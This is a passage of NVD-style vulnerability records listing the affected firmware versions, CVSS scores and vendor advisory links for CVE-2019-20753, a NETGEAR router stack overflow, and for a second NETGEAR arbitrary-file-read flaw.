"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "46D1F73B-1AE0-40AE-BED7-CAE3C7EFEE3B",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54EEBD4A-4734-4F43-B7D4-39D81C83A873",
"versionEndExcluding": "1.0.0.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "AB00ECAD-7474-4D85-8248-D014E5808814",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "182CD45B-F4DB-43E4-9E4C-AADAFD2ECAD8",
"versionEndExcluding": "1.2.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects DGN2200v1 before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.78, D6220 before 1.0.0.44, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900 before 1.0.2.16, R7000P before 1.3.2.34, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.2.34, R7000 before 1.0.9.28, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.50."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un atacante no autenticado. Esto afecta a DGN2200v1 versiones anteriores a 1.0.0.58, D8500 versiones anteriores a 1.0.3.42, D7000v2 versiones anteriores a 1.0.0.51, D6400 versiones anteriores a 1.0.0.78, D6220 versiones anteriores a 1.0.0.44, JNDR3000 versiones anteriores a 1. 0.0.24, R8000 versiones anteriores a 1.0.4.18, R8500 versiones anteriores a 1.0.2.122, R8300 versiones anteriores a 1.0.2.122, R7900 versiones anteriores a 1.0.2.16, R7000P versiones anteriores a 1.3.2.34, R7300DST versiones anteriores a 1.0.0. 68, R7100LG versiones anteriores a 1.0.0.46, R6900P versiones anteriores a 1.3.2.34, R7000 versiones anteriores a 1.0.9.28, R6900 versiones anteriores a 1.0.1.46, R6700 versiones anteriores a 1.0.1.46, R6400v2 versiones anteriores a 1.0.2. 56, R6400 versiones anteriores a 1.0.1.42, R6300v2 versiones anteriores a 1.0.4.28, R6250 versiones anteriores a 1.0.4.26, WNDR3400v3 versiones anteriores a 1.0.1.22, WNDR4500v2 versiones anteriores a 1.0.0.72, y WNR3500Lv2 versiones anteriores a 1.2.0.50."
}
],
"id": "CVE-2019-20753",
"lastModified": "2024-11-21T04:39:16.390",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T22:15:12.790",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060629/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Modem-Routers-PSV-2018-0085"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060629/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Modem-Routers-PSV-2018-0085"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-22 15:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by an attacker's ability to read arbitrary files. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX6200v2 before 1.0.1.50, EX7000 before 1.0.0.56, JR6150 before 1.0.1.18, R6050 before 1.0.1.10J, R6100 before 1.0.1.16, R6150 before 1.0.1.10, R6220 before 1.1.0.50, R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.26, R6700v2 before 1.2.0.4, R6800 before 1.0.1.10, R6900 before 1.0.1.26, R6900P before 1.0.0.58, R6900v2 before 1.2.0.4, R7000 before 1.0.9.6, R7000P before 1.0.0.58, R7100LG before 1.0.0.32, R7300 before 1.0.0.54, R7500 before 1.0.0.112, R7500v2 before 1.0.3.20, R7800 before 1.0.2.36, R7900 before 1.0.1.18, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.2.40, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, and WNR3500Lv2 before 1.2.0.44.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B8AA0851-BFD5-45F6-9673-CA4B83D8B844",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD763D04-70A0-4A50-8866-330B82703680",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB2B81-08D9-4C81-B6DE-8D1FCAEC485A",
"versionEndExcluding": "1.0.1.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB24F17D-A9A8-4EF9-BF53-580395D60EFC",
"versionEndExcluding": "1.0.1.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5E70AF3-FFD8-4ACD-9F4C-DB03BFB1125A",
"versionEndExcluding": "1.0.3.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FCA60A85-77FF-41BF-89FA-7EB3ACFECDB8",
"versionEndExcluding": "1.0.0.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5C27C8A-1B80-47CD-B015-14588F4F8732",
"versionEndExcluding": "1.0.0.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "373DAD59-79CC-428D-AD6D-935DFD360D39",
"versionEndExcluding": "1.0.1.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "B4F62287-CB55-4FB1-AA39-62018654BA39",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "274A58AC-3E28-411B-8495-2ADD184CFAE6",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC9C60BB-2E7F-4D35-9348-8D8AEFAAD75F",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D2DECC28-182A-496F-91DA-C2B5DA6F7AF5",
"versionEndExcluding": "1.0.1.10j",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "01A66936-4268-4990-8E83-24C74A75B9F6",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F44A123-B256-428B-98C2-17570F2F32DC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0330A404-6120-4F8E-9600-C2524EA1DEC7",
"versionEndExcluding": "1.0.1.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "05ED104B-38C7-4D9E-9239-B8556787C32B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E464FF8D-6202-40BA-9740-9CCE2BC23607",
"versionEndExcluding": "1.1.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F3464F16-A6EB-47C0-B2B5-54E86743DC70",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E43DA92A-E429-459F-8B34-DDED55F5590B",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "29EA60BF-FBA6-4305-8173-07130A527410",
"versionEndExcluding": "1.0.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB7B08B9-07D2-4404-846A-D1CA02C16557",
"versionEndExcluding": "1.0.2.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC332E60-A7DB-41C5-B1ED-FE3EDF83F8BC",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0EA5FF68-8609-4692-8DBF-A12606882BE5",
"versionEndExcluding": "1.2.0.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9706E6-CA53-43E4-91B0-D52655C86860",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE2B75FA-179C-41A9-B5A3-26EFF452EA0B",
"versionEndExcluding": "1.0.1.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09404083-B00B-4C1F-8085-BC242E625CA3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D21ACC48-8B3D-4A0B-BA04-C9709835A66A",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A6BA926B-4B26-4478-837A-A3B2DE734392",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8B89AB47-7117-4FA7-B8F1-36D0C281C403",
"versionEndExcluding": "1.2.0.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E8EB69B-6619-47B6-A073-D0B840D4EB0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "819CC65F-F5DA-4620-BC68-CAAA2B73195D",
"versionEndExcluding": "1.0.9.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F0C755C-3012-440E-BE85-D98D41F54ED9",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "833A98AF-A4B0-4C68-AACD-6B3F58E64060",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D264AB39-63DD-4B32-9A91-D86A3700733D",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "29B13F94-F151-4F00-95C3-D9FB22B3CC2B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "56014B19-02F8-4942-9889-7F3A4EB8F106",
"versionEndExcluding": "1.0.0.112",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EF3B3F26-401C-4ED0-B871-4B4F8521F369",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A98819AD-045F-45AE-9579-258E41882CD9",
"versionEndExcluding": "1.0.3.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E0DFBF4-E393-44AE-AEF9-1B2059EE5AE8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3255D316-04E5-4056-BFFF-38B042167A74",
"versionEndExcluding": "1.0.2.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A98DFA81-D1BA-41AE-A6A3-1EBBFC452D0F",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7393D4D7-F607-423E-917E-FE520D7A3A73",
"versionEndExcluding": "1.0.3.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DAAB159C-27F2-4645-9FE4-4DBB4465DE3A",
"versionEndExcluding": "1.0.2.104",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A79D8A77-4555-4B2A-8F19-F69AD4A17D2E",
"versionEndExcluding": "1.0.2.104",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
